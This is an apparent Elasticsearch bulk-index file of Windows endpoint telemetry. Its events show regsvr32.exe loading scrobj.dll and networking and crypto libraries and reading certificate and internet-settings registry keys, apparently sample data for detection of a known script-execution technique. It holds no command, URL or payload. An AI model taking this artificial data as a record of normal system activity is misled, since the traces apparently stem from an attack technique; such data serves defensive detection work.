{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\uxtheme.dll" , "name" : "uxtheme.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\scrobj.dll" , "name" : "scrobj.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\advapi32.dll" , "name" : "advapi32.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\urlmon.dll" , "name" : "urlmon.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\windows.storage.dll" , "name" : "windows.storage.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\profapi.dll" , "name" : "profapi.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\powrprof.dll" , "name" : "powrprof.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\iertutil.dll" , "name" : "iertutil.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\fltLib.dll" , "name" : "fltLib.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptbase.dll" , "name" : "cryptbase.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dwmapi.dll" , "name" : "dwmapi.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sspicli.dll" , "name" : "sspicli.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ws2_32.dll" , "name" : "ws2_32.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" , "name" : "OnDemandConnRouteHelper.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winhttp.dll" , "name" : "winhttp.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" , "value" : "ZoneMap" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" , "value" : "ProxyBypass" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" , "value" : "IntranetName" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" , "value" : "UNCAsIntranet" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" , "value" : "AutoDetect" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" , "value" : "ProxyBypass" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" , "value" : "IntranetName" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" , "value" : "UNCAsIntranet" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" , "value" : "AutoDetect" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\nsi.dll" , "name" : "nsi.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mswsock.dll" , "name" : "mswsock.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winnsi.dll" , "name" : "winnsi.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\crypt32.dll" , "name" : "crypt32.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msasn1.dll" , "name" : "msasn1.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dpapi.dll" , "name" : "dpapi.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wintrust.dll" , "name" : "wintrust.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptsp.dll" , "name" : "cryptsp.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rsaenh.dll" , "name" : "rsaenh.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT" , "value" : "ROOT" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT" , "value" : "ROOT" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot" , "value" : "AuthRoot" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot" , "value" : "SmartCardRoot" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dnsapi.dll" , "name" : "dnsapi.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rasadhlp.dll" , "name" : "rasadhlp.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wininet.dll" , "name" : "wininet.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\FWPUCLNT.DLL" , "name" : "FWPUCLNT.DLL" } , "@timestamp" : 131883573238400000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\schannel.dll" , "name" : "schannel.dll" } , "@timestamp" : 131883573238700016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL" , "value" : "SCHANNEL" , "key" : "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238700016 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mskeyprotect.dll" , "name" : "mskeyprotect.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
